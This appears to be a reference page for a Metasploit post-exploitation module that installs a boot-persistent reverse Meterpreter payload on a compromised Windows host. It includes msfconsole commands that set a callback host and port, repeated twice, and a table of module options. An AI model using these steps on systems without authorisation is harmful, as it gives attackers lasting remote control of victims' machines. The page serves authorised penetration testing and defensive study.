Windows Manage Persistent Payload Installer
This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. REXE mode will transfer a binary of your choosing to remote host to be used as a payload.
Rank
- Normal
Authors
- Carlos Perez < carlos_perez [at] darkoperator.com >
- Merlyn drforbin Cousins < drforbin6 [at] gmail.com >
Development
Similar Modules
- post/windows/manage/add_user_domain
- post/windows/manage/autoroute
- post/windows/manage/delete_user
- post/windows/manage/download_exec
- post/windows/manage/enable_rdp
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/migrate
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use post/windows/manage/persistence
msf post(persistence) > set LHOST [MY IP ADDRESS]
msf post(persistence) > set LPORT [MY LISTENER PORT]
msf post(persistence) > set SESSION [INTEGER]
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use post/windows/manage/persistence
msf post(persistence) > set LHOST [MY IP ADDRESS]
msf post(persistence) > set LPORT [MY LISTENER PORT]
msf post(persistence) > set SESSION [INTEGER]
Module Options
| DELAY | Delay in seconds for persistent payload to reconnect. (default: 5) |
| HANDLER | Start a Multi/Handler to Receive the session. (default: true) |
| LHOST | IP for persistent payload to connect to. |
| LPORT | Port for persistent payload to connect to. |
| PAYLOAD_TYPE | Meterpreter Payload Type. (accepted: TCP, HTTP, HTTPS) (default: TCP) |
| REXE | The remote executable to use. (default: ) |
| REXENAME | The name to call exe on remote system (default: ) |
| SESSION | The session to run this module on. |
| STARTUP | Startup type for the persistent payload. (accepted: USER, SYSTEM, SERVICE) (default: USER) |
| TEMPLATE | Alternate template Windows PE File to use. |
| ENCODER | Encoder name to use for encoding. |
| ITERATIONS | Number of iterations for encoding. |
| OPTIONS | Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |